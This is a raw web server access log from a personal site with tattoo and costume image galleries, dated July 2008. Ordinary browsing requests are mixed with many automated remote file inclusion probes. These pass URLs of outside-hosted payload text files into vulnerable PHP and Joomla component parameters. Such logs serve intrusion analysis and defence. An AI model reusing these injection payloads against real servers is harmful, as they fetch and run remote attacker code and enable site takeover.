68.104.91.231 - - [30/Jul/2008:22:59:23 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:37 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:38 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:38 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:38 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:38 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:38 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:38 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:38 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:38 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:38 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:38 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:49 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:49 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:49 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:50 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:50 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:50 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:50 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:50 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:50 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:50 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:50 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
64.150.164.61 - - [30/Jul/2008:23:00:20 -0500] "GET /logs/access_log.1214524800//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
72.248.189.82 - - [30/Jul/2008:23:00:32 -0500] "GET /logs/access_log.1212796800/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
80.231.0.98 - - [30/Jul/2008:23:01:37 -0500] "GET /logs/errors.php?error=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
80.231.0.98 - - [30/Jul/2008:23:01:37 -0500] "GET /errors.php?error=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:23:03:09 -0500] "GET /logs/access_log.1213142400//agendax/addevent.inc.php?agendax_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
81.9.63.18 - - [30/Jul/2008:23:03:22 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.proxi-com.ru/images/mail.gif?? HTTP/1.1" 404 361 "-""libwww-perl/5.811"
81.9.63.18 - - [30/Jul/2008:23:03:22 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.proxi-com.ru/images/mail.gif?? HTTP/1.1" 404 356 "-""libwww-perl/5.811"
189.102.16.28 - - [30/Jul/2008:23:04:22 -0500] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.808"
189.102.16.28 - - [30/Jul/2008:23:04:23 -0500] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.808"
193.207.106.54 - - [30/Jul/2008:23:05:06 -0500] "GET /?INCLUDE_FOLDER=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
193.207.106.54 - - [30/Jul/2008:23:05:15 -0500] "GET /logs/?INCLUDE_FOLDER=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 200 36689 "-""libwww-perl/5.79"
64.150.164.61 - - [30/Jul/2008:23:05:52 -0500] "GET /logs/access_log.1214438400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
202.30.194.70 - - [30/Jul/2008:23:06:01 -0500] "GET //includes/db_adodb.php?baseDir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.30.194.70 - - [30/Jul/2008:23:06:01 -0500] "GET /logs/access_log.1214438400//includes/db_adodb.php?baseDir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.30.194.70 - - [30/Jul/2008:23:06:01 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
212.227.48.112 - - [30/Jul/2008:23:06:45 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.805"
212.227.48.112 - - [30/Jul/2008:23:06:45 -0500] "GET /?INCLUDE_FOLDER=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
66.249.70.131 - - [30/Jul/2008:23:06:55 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.150.164.61 - - [30/Jul/2008:23:09:07 -0500] "GET /logs/access_log.1212883200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.205.68.170 - - [30/Jul/2008:23:09:50 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.810"
67.205.68.170 - - [30/Jul/2008:23:09:50 -0500] "GET /?INCLUDE_FOLDER=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
85.10.128.148 - - [30/Jul/2008:23:10:43 -0500] "GET /logs//login.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.10.128.148 - - [30/Jul/2008:23:10:43 -0500] "GET //login.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.10.128.148 - - [30/Jul/2008:23:11:36 -0500] "GET //login.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.10.128.148 - - [30/Jul/2008:23:11:36 -0500] "GET /logs//login.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.169.186.162 - - [30/Jul/2008:23:12:11 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:23:12:11 -0500] "GET /phphtml.php?htmlclass_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
85.10.128.148 - - [30/Jul/2008:23:12:11 -0500] "GET //skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
85.10.128.148 - - [30/Jul/2008:23:12:12 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
202.30.194.70 - - [30/Jul/2008:23:12:14 -0500] "GET /logs//netcat/require/index.php?ROOT_FOLDER=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.30.194.70 - - [30/Jul/2008:23:12:14 -0500] "GET /logs/access_log.1216598400//netcat/require/index.php?ROOT_FOLDER=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
202.30.194.70 - - [30/Jul/2008:23:12:14 -0500] "GET //netcat/require/index.php?ROOT_FOLDER=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
85.214.59.54 - - [30/Jul/2008:23:12:20 -0500] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
85.214.59.54 - - [30/Jul/2008:23:12:20 -0500] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
76.16.65.230 - - [30/Jul/2008:23:12:29 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:12:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:12:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
85.239.113.1 - - [30/Jul/2008:23:12:44 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
85.10.128.148 - - [30/Jul/2008:23:12:55 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
85.10.128.148 - - [30/Jul/2008:23:12:55 -0500] "GET //skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
76.16.65.230 - - [30/Jul/2008:23:13:13 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:13:14 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:13:14 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:13:14 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
85.239.113.1 - - [30/Jul/2008:23:13:15 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:23:13:16 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
76.16.65.230 - - [30/Jul/2008:23:13:16 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
85.239.113.1 - - [30/Jul/2008:23:13:16 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:23:13:16 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
67.19.81.18 - - [30/Jul/2008:23:13:18 -0500] "GET /logs//login.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.19.81.18 - - [30/Jul/2008:23:13:18 -0500] "GET //login.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.146.61.130 - - [30/Jul/2008:23:13:23 -0500] "GET /logs//login.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:13:23 -0500] "GET //login.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:13:42 -0500] "GET //login.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:13:42 -0500] "GET /logs//login.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:13:43 -0500] "GET /logs//login.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:13:44 -0500] "GET //login.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:13:59 -0500] "GET /logs//login.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:13:59 -0500] "GET //login.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
76.16.65.230 - - [30/Jul/2008:23:14:40 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:14:41 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:14:41 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:14:41 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:14:41 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:14:41 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:14:41 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:14:41 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:14:41 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:14:41 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:14:41 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:14:41 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
76.16.65.230 - - [30/Jul/2008:23:14:41 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
81.169.186.162 - - [30/Jul/2008:23:15:20 -0500] "GET /logs/errors.php?error=http://www.larisco.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:23:15:20 -0500] "GET /errors.php?error=http://www.larisco.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.214.59.54 - - [30/Jul/2008:23:15:25 -0500] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.214.59.54 - - [30/Jul/2008:23:15:26 -0500] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
85.10.128.148 - - [30/Jul/2008:23:15:29 -0500] "GET /logs//home.php?action=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.10.128.148 - - [30/Jul/2008:23:15:29 -0500] "GET //home.php?action=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
195.93.201.102 - - [30/Jul/2008:23:15:44 -0500] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.93.201.102 - - [30/Jul/2008:23:15:44 -0500] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.10.128.148 - - [30/Jul/2008:23:15:45 -0500] "GET /logs//home.php?action=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.10.128.148 - - [30/Jul/2008:23:15:45 -0500] "GET //home.php?action=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.146.61.130 - - [30/Jul/2008:23:15:54 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:15:57 -0500] "GET //skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
212.227.48.112 - - [30/Jul/2008:23:17:22 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
212.227.48.112 - - [30/Jul/2008:23:17:22 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
81.169.186.162 - - [30/Jul/2008:23:17:39 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:23:17:39 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:23:17:39 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
200.146.61.130 - - [30/Jul/2008:23:18:01 -0500] "GET //skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:18:02 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:18:20 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:23:18:20 -0500] "GET //skin/zero_vote/error.php?dir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
81.169.186.162 - - [30/Jul/2008:23:19:16 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:23:19:17 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.larisco.com/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
67.205.68.170 - - [30/Jul/2008:23:20:29 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
67.205.68.170 - - [30/Jul/2008:23:20:29 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
